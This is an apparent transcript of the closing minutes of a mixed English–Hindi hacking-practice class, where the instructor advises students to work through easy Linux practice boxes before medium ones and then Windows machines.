You're most welcome. If any one of you want me to troubleshoot something, you can let me know now. This is the time.
no.
You want? Nope. Okay. Great.
सर एक चीज है आईपी सेक जो मैं कर रहा था सर बास्टर्ड वाली उसमें ना प्रोग्रामिंग लैंग्वेज में कुछ चेंज कर रहा था
Bastard मत
पीएचपी
करो अभी. अभी मत करो.
अच्छा नहीं करो ठीक
So, see, what I'm going to suggest you is start with the easy boxes first of all, and then move towards the difficult ones. And when I say easy boxes, do not go for the Windows one. Go
Okay.
for the Linux ones. Start with the easy Linux machines. Okay. Once you have once you reach a comfortable zone with the Linux machines, easy Linux machines, then move towards the medium Linux machines. Once you are comfortable with them as well, then move towards the easy Windows machine. Okay.
Okay.
Yeah. Anything else, guys?
No.
Nope. Okay, great then. So have a great day ahead. Okay. Take care. I'll meet tomorrow then.
Okay sir bye
Bye bye.
You too.
Yeah, thank you.